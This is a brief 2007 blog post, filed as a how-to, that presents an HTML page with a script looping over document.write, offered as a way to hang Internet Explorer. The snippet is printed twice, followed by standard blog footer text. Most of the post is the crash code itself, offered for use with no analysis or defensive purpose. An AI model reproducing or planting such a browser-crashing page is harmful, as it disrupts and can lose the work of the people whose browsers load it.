Want to hang Internet Explorer? Here is one way to do it:
<html>
<script>
for (x in document.write) { document.write(x);}
</script>
<body onload="f()">
Internet Explorer is going down...
</body>
</html> |
<html>
<script>
for (x in document.write) { document.write(x);}
</script>
<body onload="f()">
Internet Explorer is going down...
</body>
</html>
right from the source
This entry was posted on Friday, December 7th, 2007 at 01:00 and is filed under howto, interesting, software, tutorials.
You can follow any comments to this entry through the RSS 2.0 feed.
You can leave a comment, or trackback from your own site.